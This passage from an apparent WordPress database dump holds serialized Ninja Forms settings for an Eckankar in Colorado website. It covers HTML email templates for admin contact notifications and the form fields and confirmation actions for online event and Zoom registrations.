<tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\">Admin                      Notification<br>                      <br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <p style=\"font-size: 20px; margin: 0px 0px 20px; font-family: Arial,sans-serif; text-align: center;font-size:30px; color:#f28a27;\"><strong>New                                <strong><span id=\"nf-drawer-content\" style=\"color: #4f759b;\"><span></span></span></strong></strong></p>                            <strong><strong> </strong>                              <p style=\"color: #23507d;text-align:center;font-size:23px;\" class=\"nf-setting-groups\"><strong><span class=\"nf-field-settings\">{form:title}</span><span>                                  </span>Form Submission</strong></p>                            </strong>                            <div style=\"text-align: center;\"><strong> This form                                was generated from a user submission on the <em>Eckankar                                  In Colorado</em> website. You are receiving                                this submission because you are listed as a                                contact for the <em>Loveland ECK Leadership                                  organization</em>.</strong><br>                              <strong> <strong></strong></strong><br>                              <strong><strong> The following person has                                  requested contact with an ECK representative.                                  Here is the information that <span style=\"color: #666666\">{field:textbox_142}                                    {field:lastname_143}</span> has submitted:</strong>                              </strong></div>                            <strong>                              <p></p>                            </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>\";}s:2:\"id\";i:164;}i:4;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:4:\"type\";s:8:\"redirect\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-02-22 09:47:38\";s:5:\"label\";s:15:\"Success Message\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:12:\"redirect_url\";s:60:\"https://eckankar-colorado.org/thank-you-for-form-submission/\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:165;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:65:\"Central Colorado Leadership Communications -TESTING COPY ONLY!!!!\";s:10:\"created_at\";s:19:\"2021-02-21 13:50:21\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:15:\"formContentData\";a:11:{i:0;s:7:\"html_20\";i:1;s:10:\"textbox_21\";i:2;s:11:\"lastname_22\";i:3;s:8:\"email_23\";i:4;s:8:\"phone_24\";i:5;s:13:\"listselect_25\";i:6;s:5:\"hr_26\";i:7;s:7:\"html_27\";i:8;s:13:\"listselect_28\";i:9;s:11:\"textarea_29\";i:10;s:9:\"submit_31\";}s:12:\"calculations\";a:0:{}s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:10:\"conditions\";a:0:{}s:8:\"last_sub\";s:1:\"4\";s:13:\"sub_limit_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:6:\"status\";s:0:\"\";s:12:\"date_updated\";s:19:\"2017-07-04 18:10:50\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:24:\"form_title_heading_level\";s:1:\"3\";}s:14:\"deleted_fields\";a:1:{i:386;i:386;}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(42,'a:7:{s:2:\"id\";i:42;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:6:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:23:\"Register For This Event\";s:3:\"key\";s:37:\"register_for_this_event_1614289627888\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:78:\"<p>After registration, you will receive event login information via email.</p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:28:\"Test Event--SOS Registration\";s:9:\"field_key\";s:42:\"test_event--sos_registration_1613771013138\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:388;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:389;}i:2;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:390;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:391;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:392;}i:5;a:2:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"13\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:8:\"Register\";s:3:\"key\";s:8:\"register\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";}s:2:\"id\";i:393;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:108:\"<p>Thank you for registering for our event.</p><p>You Will receive an email with the Zoom Login info<br></p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:169;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:23:\"User Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:39:\"Thank you for registering for our event\";s:13:\"email_message\";s:94:\"<p>Thanks bunches!</p><p>Your registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:20:\"{system:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:167;}i:2;a:2:{s:8:\"settings\";a:25:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:24:\"Admin Email Notification\";s:2:\"to\";s:20:\"{system:admin_email}\";s:7:\"subject\";s:22:\"Ninja Forms Submission\";s:7:\"message\";s:18:\"{all_fields_table}\";s:5:\"order\";s:1:\"2\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:62:\"New Event Registration from {field:firstname} {field:lastname}\";s:13:\"email_message\";s:67:\"<p>Registration details are below:</p><p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:168;}i:3;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:16:\"Store Submission\";s:5:\"order\";s:1:\"3\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:166;}}s:8:\"settings\";a:35:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:25:\"Online Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event Registration\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";i:0;s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:6:{i:0;s:37:\"register_for_this_event_1614289627888\";i:1;s:2:\"hr\";i:2;s:9:\"firstname\";i:3;s:8:\"lastname\";i:4;s:5:\"email\";i:5;s:8:\"register\";}s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(44,'a:7:{s:2:\"id\";i:44;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:7:{i:0;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:31:\"Sound of Soul Zoom Registration\";s:3:\"key\";s:45:\"sound_of_soul_zoom_registration_1617130354644\";s:4:\"type\";s:4:\"html\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:7:\"default\";s:306:\"<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Sound of Soul Event Registration</p>\n<p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:28:\"Test Event--SOS Registration\";s:9:\"field_key\";s:42:\"test_event--sos_registration_1613771013138\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:400;}i:1;a:2:{s:8:\"settings\";a:13:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:7:\"Divider\";s:3:\"key\";s:2:\"hr\";s:4:\"type\";s:2:\"hr\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:7:\"Divider\";s:9:\"field_key\";s:2:\"hr\";}s:2:\"id\";i:401;}i:2;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:10:\"First Name\";s:3:\"key\";s:9:\"firstname\";s:4:\"type\";s:9:\"firstname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:9:\"firstname\";s:21:\"custom_name_attribute\";s:5:\"fname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:402;}i:3;a:2:{s:8:\"settings\";a:24:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:9:\"Last Name\";s:3:\"key\";s:8:\"lastname\";s:4:\"type\";s:8:\"lastname\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:8:\"lastname\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:403;}i:4;a:2:{s:8:\"settings\";a:23:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:404;}i:5;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:0:\"\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:158:\"<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:159:\"your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"413\";}i:6;a:2:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:20:\"submit_1618628929218\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:16:\"processing_label\";s:10:\"Processing\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"field_label\";s:8:\"Register\";s:9:\"field_key\";s:8:\"register\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:405;}}s:7:\"actions\";a:5:{i:0;a:2:{s:8:\"settings\";a:32:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:42:\"Your form has been successfully submitted.\";s:5:\"order\";s:1:\"1\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:222:\"<p style=\" font-size:20pt;color:#1d5791;\" align=\"center\"><b>Thank you for registering for our event!</b></p><p style=\" font-size:16pt;color:#333333\" align=\"center\">You will receive an email with Zoom Login information.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:178;}i:1;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-04-24 11:24:47\";s:5:\"label\";s:29:\"ECK Registration Confirmation\";s:13:\"email_message\";s:8336:\"<meta http-equiv=\"content-type\" content=\"text/html; charset=utf-8\">    <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">    <meta name=\"x-apple-disable-message-reformatting\">    <title>ELSS REGISTRATION - USER CONFIRMATION</title>    <!--[if mso]>  <style>    table {border-collapse:collapse;border-spacing:0;border:none;margin:0;}    div, td {padding:0;}    div {margin:0 !important;}	</style>  <noscript>    <xml>      <o:OfficeDocumentSettings>        <o:PixelsPerInch>96</o:PixelsPerInch>      </o:OfficeDocumentSettings>    </xml>  </noscript>  <![endif]-->    <style>    table, td, div, h1, p {      font-family: Arial, sans-serif;    }    @media screen and (max-width: 530px) {      .unsub {        display: block;        padding: 8px;        margin-top: 14px;        border-radius: 6px;        background-color: #555555;        text-decoration: none !important;        font-weight: bold;      }      .col-lge {        max-width: 100% !important;      }    }    @media screen and (min-width: 531px) {      .col-sml {        max-width: 27% !important;      }      .col-lge {        max-width: 73% !important;      }    }  </style>        <div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;background-color:#ffffff;\" lang=\"en\">      <table role=\"presentation\" style=\"width:100%;border:none;border-spacing:0; border:solid 1px #cccccc;\">        <tbody>          <tr>            <td style=\"padding:0;\" align=\"center\">              <!--[if mso]>          <table role=\"presentation\" align=\"center\" style=\"width:600px;\">          <tr>          <td>          <![endif]-->              <table 